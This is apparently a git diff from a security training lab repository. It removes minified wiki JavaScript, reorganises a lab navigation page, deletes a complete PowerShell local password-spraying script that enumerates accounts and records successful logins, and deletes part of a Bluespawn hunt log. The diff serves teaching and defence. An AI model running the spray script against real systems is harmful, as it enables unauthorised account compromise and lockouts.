e=a(d),f={color:"red",position:"right"},g=a.extend({},f,c),h=g.color,i=g.position,j="https://s3.amazonaws.com/github/ribbons/forkme_";"red"===h&&(j+=i+"_red_aa0000.png"),"green"===h&&(j+=i+"_green_007200.png"),"darkblue"===h&&(j+=i+"_darkblue_121621.png"),"orange"===h&&(j+=i+"_orange_ff7600.png"),"white"===h&&(j+=i+"_white_ffffff.png"),"gray"===h&&(j+=i+"_gray_6d6d6d.png");var k=e.attr("href"),l=0,m=a('<a class="forkmeongithub" href="'+k+'"><img style="position: absolute; top: '+l+";"+i+': 0; border: 0;" src="'+j+'" alt="Fork me on GitHub"></a>');a("body").prepend(m),m.find("img").css("z-index","2000"),e.remove()})}var c={name:"forkmeongithub",version:a.md.version,once:function(){a.md.linkGimmick(this,"forkmeongithub",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c,d){return a().lazygist("init"),b.each(function(b,c){var e=a(c),f=a('<div class="gist_here" data-id="'+d+'" />');e.replaceWith(f),f.lazygist({url_template:"https://gist.github.com/{id}.js?"})})}var c={name:"gist",once:function(){a.md.linkGimmick(this,"gist",b)}};a.md.registerGimmick(c)}(jQuery),function(a,b,c,d){"use strict";function e(b){var e,f,g;if(-1!==b.indexOf('rel="stylesheet"'))f=a(b).attr("href"),-1===a.inArray(f,k)&&(a("head").append(b),k.push(f));else if(-1!==b.indexOf('id="gist')){if(e=/gist([\d]{1,})/g.exec(b),g=e[1],g!==d){if(-1!==a.inArray(g,l))return;l.push(g),a(".gist_here[data-id="+g+"]").append(b)}}else j.apply(c,arguments)}var f,g="lazygist",h="0.2pre",i={url_template:"https://gist.github.com/{id}.js?file={file}",id:"data-id",file:"data-file"},j=c.write,k=[],l=[],m=[],n={init:function(b){return f=a.extend({},i,b),c.write=e,a.each(f,function(a,b){if("string"!=typeof b)throw new TypeError(b+" ("+typeof b+") is not a string")}),this.lazygist("load")},load:function(){return this.filter("["+f.id+"]").each(function(){var b,c=a(this).attr(f.id),e=a(this).attr(f.file);if(c!==d){if(-1!==a.inArray(c,m))return;m.push(c),b=f.url_template.replace(/\{id\}/g,c).replace(/\{file\}/g,e),a.getScript(b,function(){})}})},reset_write:function(){return c.write=j,this}};a.fn[g]=function(b){return n[b]?n[b].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof b&&b?void a.error("Method "+b+" does not exist on jQuery.lazygist"):n.init.apply(this,arguments)},a.fn[g].version=h}(jQuery,window,document);var googlemapsLoadDone;!function(a){function b(b,d){{var e=b;(new Date).getTime()}return e.each(function(b,e){var f=a(e),g={zoom:11,marker:!0,scrollwheel:!1,maptype:"roadmap"},h=a.extend({},g,d);void 0===h.address&&(h.address=f.attr("href"));var i="google-map-"+Math.floor(1e5*Math.random()),j=a('<div class="md-external md-external-nowidth" id="'+i+'"/>');f.replaceWith(j),c(h,i)})}function c(b,c){var d=b.maptype.toUpperCase();b.mapTypeId=google.maps.MapTypeId[d];var e=new google.maps.Geocoder;e.geocode({address:b.address},function(d,e){if("OK"===e){var f=d[0].geometry.location,g=a.extend({},b,{center:f}),h=new google.maps.Map(document.getElementById(c),g);if(g.marker===!0){new google.maps.Marker({position:f,map:h})}}})}var d="http://maps.google.com/maps/api/js?sensor=false&callback=googlemapsReady",e={name:"googlemaps",version:a.md.version,once:function(){googlemapsLoadDone=a.Deferred(),a.md.linkGimmick(this,"googlemaps",b),a.md.registerScript(this,d,{license:"EXCEPTION",loadstage:"skel_ready",finishstage:"bootstrap"}),a.md.stage("bootstrap").subscribe(function(b){a.md.triggerIsActive("googlemaps")?googlemapsLoadDone.done(function(){b()}):b()})}};a.md.registerGimmick(e)}(jQuery),function(a){function b(){var b=a("pre code[class^=lang-]");return b.each(function(){var b=a(this),c=b.attr("class"),d=c.substring(5);b.removeClass(c),b.addClass(d);hljs.highlightBlock(b[0])})}var c={name:"highlight",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var e=a(d),f=e.attr("href"),g=a('<iframe class="col-md-12" style="border: 0px solid red; height: 650px;"></iframe>');if(g.attr("src",f),e.replaceWith(g),c.width&&g.css("width",c.width),c.height)g.css("height",c.height);else{var h=function(){var b=g.offset(),c=a(window).height(),d=c-b.top-5;g.height(d)};g.load(function(){h()}),a(window).resize(function(){h()})}})}var c={name:"iframe",version:a.md.version,once:function(){a.md.linkGimmick(this,"iframe",b)}};a.md.registerGimmick(c)}(jQuery),function(a){function b(b){b.remove();var c=document.createElement("script");c.type="text/javascript",c.src=a.md.prepareLink("cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML",{forceHTTP:!0}),document.getElementsByTagName("head")[0].appendChild(c)}var c={name:"math",once:function(){a.md.linkGimmick(this,"math",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";var b=[{name:"bootstrap",url:"netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css"},{name:"amelia",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/amelia/bootstrap.min.css"},{name:"cerulean",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cerulean/bootstrap.min.css"},{name:"cosmo",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cosmo/bootstrap.min.css"},{name:"cyborg",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cyborg/bootstrap.min.css"},{name:"flatly",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/flatly/bootstrap.min.css"},{name:"journal",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/journal/bootstrap.min.css"},{name:"readable",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/readable/bootstrap.min.css"},{name:"simplex",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/simplex/bootstrap.min.css"},{name:"slate",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/slate/bootstrap.min.css"},{name:"spacelab",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/spacelab/bootstrap.min.css"},{name:"united",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/united/bootstrap.min.css"},{name:"yeti",url:"netdna.bootstrapcdn.com/bootswatch/3.0.2/yeti/bootstrap.min.css"}],c=!1,d={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"themechooser",h,"skel_ready"),a.md.linkGimmick(this,"theme",g)}};a.md.registerGimmick(d);var e=a.md.getLogger(),f=function(c){if(c.inverse=c.inverse||!1,void 0===c.url){if(!c.name)return void e.error("Theme name must be given!");var d=b.filter(function(a){return a.name===c.name})[0];if(!d)return void e.error("Theme "+name+" not found, removing link");c=a.extend(c,d)}a('link[rel=stylesheet][href*="netdna.bootstrapcdn.com"]').remove();var f=a("style[id*=bootstrap]").length>0;"bootstrap"===c.name&&f||(a("style[id*=bootstrap]").remove(),a('<link rel="stylesheet" type="text/css">').attr("href",a.md.prepareLink(c.url)).appendTo("head")),c.inverse===!0?(a("#md-main-navbar").removeClass("navbar-default"),a("#md-main-navbar").addClass("navbar-inverse")):(a("#md-main-navbar").addClass("navbar-default"),a("#md-main-navbar").removeClass("navbar-inverse"))},g=function(b,d,e){d.name=d.name||e,b.each(function(b,e){a.md.stage("postgimmick").subscribe(function(b){a(e);void 0!==window.localStorage.theme&&c||f(d),b()})}),b.remove()},h=function(d,e,f){return c=!0,a.md.stage("bootstrap").subscribe(function(a){i(e),a()}),d.each(function(c,d){var e=a(d),g=a('<a href=""></a><ul></ul>');g.eq(0).text(f),a.each(b,function(b,c){var d=a("<li></li>");g.eq(1).append(d);a("<a/>").text(c.name).attr("href","").click(function(a){a.preventDefault(),window.localStorage.theme=c.name,window.location.reload()}).appendTo(d)}),g.eq(1).append('<li class="divider" />');var h=a("<li/>"),i=a("<a>Use default</a>");i.click(function(a){a.preventDefault(),window.localStorage.removeItem("theme"),window.location.reload()}),h.append(i),g.eq(1).append(h),g.eq(1).append('<li class="divider" />'),g.eq(1).append('<li><a href="http://www.bootswatch.com">Powered by Bootswatch</a></li>'),e.replaceWith(g)})},i=function(b){window.localStorage.theme&&(b=a.extend({name:window.localStorage.theme},b),f(b))}}(jQuery),function(a){var b=a.md.prepareLink("platform.twitter.com/widgets.js"),c='!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="'+b+'";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");',d={name:"TwitterGimmick",version:a.md.version,once:function(){a.md.linkGimmick(this,"twitterfollow",e),a.md.registerScript(this,c,{license:"EXCEPTION",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(d);var e=function(b){return b.each(function(b,c){var d,e=a(c),f=e.attr("href");if(f.indexOf("twitter.com")<=0){d=e.attr("href"),f=a.md.prepareLink("twitter.com/"+d),"@"===d[0]&&(d=d.substring(1));var g=a('<a href="'+f+'" class="twitter-follow-button" data-show-count="false" data-lang="en" data-show-screen-name="false">@'+d+"</a>");e.replaceWith(g)}})}}(jQuery),function(a){function b(){var b=a("a[href*=youtube\\.com]:empty, a[href*=youtu\\.be]:empty");b.each(function(){var b=a(this),c=b.attr("href");if(void 0!==c){var d=/.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/,e=c.match(d);if(e&&11===e[1].length){var f=e[1],g=a('<iframe class="md-external" frameborder="0" allowfullscreen></iframe>');g.attr("src","http://youtube.com/embed/"+f),b.replaceWith(g)}}})}var c={name:"youtube",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){var d={type:"class",style:"plain",direction:"LR",scale:"100"},e=a.extend({},d,c);return b.each(function(b,c){var d=a(c),f="http://yuml.me/diagram/",g=d.attr("href"),h=d.attr("title");h=h?h:"",g=g.replace(new RegExp("`","g"),"(").replace(new RegExp("´","g"),")"),f+=e.style+";dir:"+e.direction+";scale:"+e.scale+"/"+e.type+"/"+g;var i=a('<img src="'+f+'" title="'+h+'" alt="'+h+'">');d.replaceWith(i)})}var c={name:"yuml",version:a.md.version,once:function(){a.md.linkGimmick(this,"yuml",b),a.md.registerScript(this,"",{license:"LGPL",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(c)}(jQuery);</script>
-<!-- END dist/MDwiki.min.js -->
-
-</head>
-<body>
-    <noscript>
-        This website requires Javascript to be enabled. Please turn on Javascript
-        and reload the page.
-    </noscript>
-
-    <div id="md-all">
-    </div>
-</body>
-</html>
diff --git a/IntroClassFiles/navigation.md b/IntroClassFiles/navigation.md
index edc0cc5f..71b74e6a 100644
--- a/IntroClassFiles/navigation.md
+++ b/IntroClassFiles/navigation.md
@@ -1,5 +1,5 @@
 # Intro
-[Intro To SOC]()
+## [Intro To SOC]()
 
   - [Linux CLI](Tools/IntroClass/LinuxCLI/LinuxCLI.md)
   - [Memory Analysis (Volatility)](Tools/IntroClass/Memory/MemoryAnalysis(Volatility).md)
@@ -24,41 +24,72 @@
 
   - [ACHunter2](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/RITA/ACHunter2.md)
 
-[Intro To Security]()
+<br><br>
+## [Intro To Security]()
 
  - [Applocker](Tools/IntroClass/AppLocker/AppLocker.md)
- - [Atomic RedTeam, Metasploit and Bluespawn](Tools/IntroClass/bluespawn/Bluespawn.md)
- - [DeepBlueCLI](Tools/IntroClass/deepbluecli/DeepBlueCLI.md)
- - [Nessus](Tools/IntroClass/nessus/Nessus.md)
+ - [Atomic RedTeam and Bluespawn](Tools/IntroClass/bluespawnIntroClass/Bluespawn.md)
+ - [DeepBlueCLI](Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md)
+ - [Nessus](Tools/IntroClass/nessusIntroClass/Nessus.md)
  - [Host Firewalls and Nmap](Tools/IntroClass/Nmap/Nmap.md)
  - [Password Cracking](Tools/IntroClass/PasswordCracking/PasswordCracking.md)
  - [Password Spraying](Tools/IntroClass/PasswordSpray/PasswordSpray.md)
  - [External Password Spraying](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/ExternalPasswordSpray.md)
  - [Responder](Tools/IntroClass/Responder/Responder.md)
- - [RITA and AC Hunter](Tools/IntroClass/RITA/RITA.md)
+ - [RITA and AC Hunter](Tools/IntroClass/RITAIntroClass/RITA.md)
  - [Sysmon](Tools/IntroClass/Sysmon/Sysmon.md)
- - [Web Testing](Tools/IntroClass/WebTesting/WebTesting.md)
- - [Azure IR](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md)
- - [AC Hunter CE](Tools/IntroClass/ACHCE/ACHunterCE.md)
+ - [Web Testing](Tools/IntroClass/WebTestingIntroClass/WebTesting.md)
+ - [AC Hunter CE](Tools/IntroClass/ACHCEIntroClass/ACHunterCE.md)
  - [PingCastle](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/PingCastle.md)
+ - [Azure IR](/IntroClassFiles/Tools/IntroClass/AZURE-MSP-WRITEUP-main/README.md)
  - [Wireless](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/Wireless.md)
+
+<br><br>
+## [Cyber Deception/Active Defense]()
+
+### Network Honeypots
+  - [Spidertrap](Tools/IntroClass/ADHD/Spidertrap/Spidertrap.md)
+  - [Cowrie](Tools/IntroClass/ADHD/Cowrie/Cowrie.md)
+  - [Portspoof](Tools/IntroClass/ADHD/Portspoof/Portspoof.md)
+  - [HoneyPorts](Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md)
+  - [OpenCanary](Tools/IntroClass/ADHD/openCanary.md)
+  - [Beelzebub](Tools/IntroClass/ADHD/Beelzebub.md)
+
+### Endpoint / Identity / AD deception  
+  - [HoneyBadger](Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md)
+  - [HoneyShare](Tools/IntroClass/ADHD/honeyshare/HoneyShare.md)
+  - [HoneyUser](Tools/IntroClass/ADHD/honeyuser/honeyuser.md)
+  - [AdvancedC2](Tools/IntroClass/ADHD/pcap/AdvancedC2PCAPAnalysis.md)
+ 
+### Web / Application
+  - [WebHoneypot](Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md)
+  - [Glastopf](Tools/IntroClass/ADHD/Glastopf.md)
+  - [ModSecurity](Tools/IntroClass/ADHD/ModSecurity.md)
+  - [Haraka](Tools/IntroClass/ADHD/Haraka.md)
+
+### Malware capture & analysis
+  - [Dioanea](Tools/IntroClass/ADHD/dionaea.md)
   
-[Cyber Deception/Active Defense]()
-
-  - [Spidertrap](Tools/IntroClass/Spidertrap.md)
-  - [Cowrie](Tools/IntroClass/Cowrie.md)
-  - [Canarytokens](Tools/IntroClass/canarytokens/Canarytokens.md)
-  - [RITA](Tools/IntroClass/RITA/RITA.md)
-  - [Bluespawn](Tools/IntroClass/bluespawn/Bluespawn.md)
-  - [Portspoof](Tools/IntroClass/Portspoof.md)
-  - [HoneyBadger](Tools/IntroClass/HoneyBadger.md)
-  - [HoneyShare](Tools/IntroClass/honeyshare/HoneyShare.md)
-  - [HoneyUser](Tools/IntroClass/honeyuser/honeyuser.md)
-  - [AdvancedC2](Tools/IntroClass/pcap/AdvancedC2PCAPAnalysis.md)
-  - [WebHoneypot](Tools/IntroClass/webhoneypot/webhoneypot.md)
-  - [File Audit](Tools/IntroClass/FileAudit/FileAudit.md)
-  - [Beelzebub](https://github.com/strandjs/SOC_Analyst_Labs/blob/main/courseFiles/Section_08-deceptionSystems/beelzebubLab.md)
+### DNS / Network tooling
+  - [RITA](Tools/IntroClass/ADHD/RITA_ADHD/RITA.md)
+  - [DNSChef](Tools/IntroClass/ADHD/DNSChef.md)
+  - [FakeNet-NG](Tools/IntroClass/ADHD/FakeNet-NG.md)
+  
+
+### Phishing / Social-engineering  
+  - [Canarytokens](Tools/IntroClass/ADHD/canarytokens/Canarytokens.md)
   - [Canary Token Cloner](https://github.com/strandjs/SOC_Analyst_Labs/blob/main/courseFiles/Section_08-deceptionSystems/CanaryToken_lab/CanaryToken_lab.md)
+  - [GoPhish](Tools/IntroClass/ADHD/GoPhish.md)
+  - [Mailoney](Tools/IntroClass/ADHD/Mailoney.md)
+  
+  
+### Red/Purple team detection testing
+  - [Bluespawn](Tools/IntroClass/ADHD/bluespawn/Bluespawn.md)
+  - [Caldera](Tools/IntroClass/ADHD/Caldera.md)
+
+
+### File / Data deception & auditing
+  - [File Audit](Tools/IntroClass/ADHD/FileAudit/FileAudit.md)
 
 *** 
 [How to Destroy the Cloud Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
diff --git a/LocalPasswordSpray.ps1 b/LocalPasswordSpray.ps1
deleted file mode 100644
index 0b75914b..00000000
--- a/LocalPasswordSpray.ps1
+++ /dev/null
@@ -1,99 +0,0 @@
-function Invoke-LocalPasswordSpray{
-<#
-.SYNOPSIS
-
-This module performs a password spray attack against the local users of a system. By default it will automatically generate the userlist from the system. Be careful not to lockout any accounts.
-
-PivotAll Function: Invoke-LocalPasswordSpray
-Author: Beau Bullock (@dafthack) 
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-.DESCRIPTION
-
-This module performs a password spray attack against the local users of a system. By default it will automatically generate the userlist from the system. Be careful not to lockout any accounts.
-
-.PARAMETER UserList
-
-Optional UserList parameter. This will be generated automatically if not specified
-
-.PARAMETER Password
-
-A single password that will be used to perform the password spray
-
-.EXAMPLE
-
-C:\PS> Invoke-LocalPasswordSpray -Password Spring2017
-
-Description
------------
-This command will automatically generate a list of users from the local system and attempt to authenticate using each username and a password of Spring2017.
-
-.EXAMPLE
-
-C:\PS> Invoke-LocalPasswordSpray -UserList users.txt -Password Winter2017
-
-Description
------------
-This command will use the userlist at users.txt and try to authenticate using the password Winter2017 for each user.
-
-
-#>
-Param(
- [Parameter(Position = 1, Mandatory = $false)]
- [string]
- $UserList = "C:\temp\UserList.txt",
-
- [Parameter(Position = 2, Mandatory = $false)]
- [string]
- $Password
-
-)
-
-$UserListExists = Test-Path "$UserList"
-If ($UserListExists -eq $False) {
-    #Create a list of all local users if not specified
-Write-Host "##### Making a list of all local users  #####"
-$mkdir = "cmd.exe /C mkdir C:\temp\"
-Invoke-Expression -Command:$mkdir
-$net_users = "cmd.exe /C net users > C:\temp\raw-users.txt"
-Invoke-Expression -Command:$net_users
-
-    # Moving Net Users output to one username per line
-$stripped_users = (Get-Content -Encoding Ascii "C:\temp\raw-users.txt" | select -Skip 4  | Where-Object {$_ -notmatch 'The command completed successfully.'}) 
-$trimmed = $stripped_users.Trim()
-$one_user_per_line = $trimmed -Replace '\s+',"`r`n"
-$one_user_per_line | Out-File -Encoding ascii C:\temp\UserList.txt
-
-$del_raw = "cmd.exe /C del C:\temp\raw-users.txt"
-Invoke-Expression -Command:$del_raw
-}
-
-Write-Host "[*] Using $UserList as userlist to spray with"
-If (!$DomainController){$get_dc = "cmd.exe /C echo %logonserver% 2>&1"
-$DomainController = Invoke-Expression -Command:$get_dc
-}
-
-$time = Get-Date
-Write-Host -ForegroundColor Yellow "[*] Password spraying has started. Current time is $($time.ToShortTimeString())"
-Write-Host "[*] This might take a while depending on the total number of users"
-$curr_user = 0
-$Users = Get-Content $UserList
-$count = $Users.count
-Add-Type -assemblyname system.DirectoryServices.accountmanagement 
-$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
-
-ForEach($User in $Users){
-$Auth_check = $DS.ValidateCredentials($User, $Password) 
-    If ($Auth_check -eq $true)
-    {
-    Add-Content C:\temp\sprayed-creds.txt $User`:$Password
-    Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
-    }
-    $curr_user+=1 
-    Write-Host -nonewline "$curr_user of $count users tested`r"
-    }
-Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
-Write-Host -ForegroundColor Yellow "[*] Any passwords that were successfully sprayed have been output to C:\temp\sprayed-creds.txt"
-}
\ No newline at end of file
diff --git a/README.md b/README.md
index 9d9a85d9..3a72ccb8 100644
--- a/README.md
+++ b/README.md
@@ -1 +1,4 @@
 # IntroLabs
+
+
+## For the Labs Navigation File go [here](/IntroClassFiles/navigation.md)
diff --git a/Sysmon64.exe b/Sysmon64.exe
deleted file mode 100644
index 94ec03f3..00000000
Binary files a/Sysmon64.exe and /dev/null differ
diff --git a/Test b/Test
deleted file mode 100644
index 110c58e6..00000000
--- a/Test
+++ /dev/null
@@ -1 +0,0 @@
-Test 2
diff --git a/bluespawn-06-15-2020-1013-25.xml b/bluespawn-06-15-2020-1013-25.xml
deleted file mode 100644
index 3d4a3117..00000000
--- a/bluespawn-06-15-2020-1013-25.xml
+++ /dev/null
@@ -1,2503 +0,0 @@
-<bluespawn>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367112056800000" datetime="2020-06-15 16:13:25.68000Z">
-        <name>T1004 - Winlogon Helper DLL</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="12" time="132367112056950000" datetime="2020-06-15 16:13:25.69500Z">
-        <name>T1013 - Port Monitors</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="12" time="132367112058050000" datetime="2020-06-15 16:13:25.80500Z">
-        <name>T1015 - Accessibility Features</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="17" tactics="4" time="132367112058980000" datetime="2020-06-15 16:13:25.89800Z">
-        <name>T1031 - Modify Existing Service</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="8" tactics="16" time="132367112064750000" datetime="2020-06-15 16:13:26.47500Z">
-        <name>T1036 - Masquerading</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="132" time="132367112065380000" datetime="2020-06-15 16:13:26.53800Z">
-        <name>T1037 - Logon Scripts</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367112065850000" datetime="2020-06-15 16:13:26.58500Z">
-        <name>T1060 - Registry Run Keys / Startup Folder</name>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Standalone Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Standalone Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"</data>
-        </detection>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="8" time="132367112079930000" datetime="2020-06-15 16:13:27.99300Z">
-        <name>T1068 - Exploitation for Privilege Escalation</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="9" datasources="16" tactics="16" time="132367112081040000" datetime="2020-06-15 16:13:28.10400Z">
-        <name>T1089 - Disabling Security Tools</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="8" tactics="12" time="132367112081040000" datetime="2020-06-15 16:13:28.10400Z">
-        <name>T1100 - Web Shells</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367112081200000" datetime="2020-06-15 16:13:28.12000Z">
-        <name>T1101 - Security Support Provider</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="16" tactics="12" time="132367112081200000" datetime="2020-06-15 16:13:28.12000Z">
-        <name>T1103 - AppInit DLLs</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="4" time="132367112081350000" datetime="2020-06-15 16:13:28.13500Z">
-        <name>T1128 - Netsh Helper DLL</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367112084020000" datetime="2020-06-15 16:13:28.40200Z">
-        <name>T1131 - Authentication Package</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="64" tactics="4" time="132367112084960000" datetime="2020-06-15 16:13:28.49600Z">
-        <name>T1136 - Account Created</name>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>8121</recordid>
-            <time>2020-06-12 19:06:42.634449000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:06:42.6344490Z'/&gt;&lt;EventRecordID&gt;8121&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9480'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;allowlist&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1203&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;allowlist&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>allowlist</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>7988</recordid>
-            <time>2020-06-12 19:02:51.179322700Z</time>
-            <channel>Security</channel>
